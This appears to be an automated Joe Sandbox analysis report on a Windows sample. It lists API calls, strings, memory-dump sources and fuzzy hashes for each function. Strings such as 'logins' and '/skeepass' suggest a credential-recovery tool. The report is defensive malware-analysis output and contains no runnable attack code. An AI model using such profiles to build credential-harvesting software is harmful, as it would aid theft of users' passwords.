                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                                    • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                                    • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                                                                    • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                                                                    • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                                    • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                                                                    • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
